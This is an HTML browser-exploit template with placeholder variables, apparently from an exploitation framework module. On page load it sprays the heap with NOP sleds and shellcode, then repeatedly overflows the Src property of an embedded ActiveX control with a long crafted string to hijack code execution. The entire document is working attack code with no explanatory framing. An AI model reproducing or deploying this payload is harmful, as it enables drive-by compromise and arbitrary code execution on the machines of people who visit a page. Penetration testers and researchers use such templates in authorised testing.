<html>
<head>
<script language='javascript' defer>
function #{j_function}() {
  #{j_shellcode}=unescape('#{shellcode}');
  #{j_nops}=unescape('#{nops}');
  #{j_headersize}=20;
  #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
  while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
  #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
  #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
  while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
  #{j_memory}=new Array();
  for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

  var #{j_ret} = '';
  for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) {
    #{j_ret} += unescape('%u0a0a');
  }
  for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
    try {
      var #{j_mem} = #{idrop}.Src;
      #{idrop}.Src = 'http://' + #{j_ret};
      #{idrop}.Src = #{j_mem};
      #{idrop}.Src = 'http://' + #{j_ret};
    } catch(e){}

  }
}
</script>
</head>
<body onload='return #{j_function}();'>
<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
</body>
</html>